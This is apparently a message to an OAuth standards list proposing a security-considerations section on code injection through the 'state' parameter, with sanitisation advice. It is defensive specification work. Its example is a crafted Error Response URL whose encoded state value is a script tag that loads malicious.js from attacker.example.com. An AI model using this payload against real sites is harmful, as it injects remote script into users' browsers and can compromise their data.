See below for revision, tried to follow the "introduction, recommendation,
example"
structure in 10.12 "Cross-site Request Forgery" and shorten my text.

I'm strugging to make it clear that any internal modification to the 'state'
parameter
must not affect the re-transmitted value of 'state' in Authorization
Response / Error
Response when it originates from the authorisation server.

---

Security Consideration: Code Injection Attacks

Code injection attacks are when an input or otherwise external variable is
used within
an application where that input can cause modification of application logic
when unsanitised. This may allow an attacker to gain access to client or
user data,
cause Denial of Service or a wide range of malicious side-effects.

Incorrect validation or sanitation of the 'state' parameter from section
4.1.2 could lead to code
injection. Both client and server SHOULD ensure that the "state" parameter
described
in section 4.1.2 is correctly sanitised for internal processing, storage or
output outside the
scope of the OAuth protocol.

Failure to correctly sanitise the 'state' parameter can cause code injection
attacks even if a
cryptographically secure extension such as [I-D.ietf-oauth-v2-http-mac] is
used.

As an example, a malicious person may create a fake Error Response as
described in section
4.1.2.1 containing a maliciously crafted state parameter. The following
request would be sent to
the client:

https://client.example.com/cb?error=access_denied&state=%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22http%3A%2F%2Fattacker.example.com%2Fmalicious.js%22%20%2F%3E

Insecure transfer of the decoded value into the HTML buffer of the client
application
may result in the injection of code into the user agent of the end user,
possibly compromising data.
This example attack can be mitigated by sanitising the 'state' parameter to
remove or escape HTML
syntax before interpolation of the value into server output to the user
agent.

--end--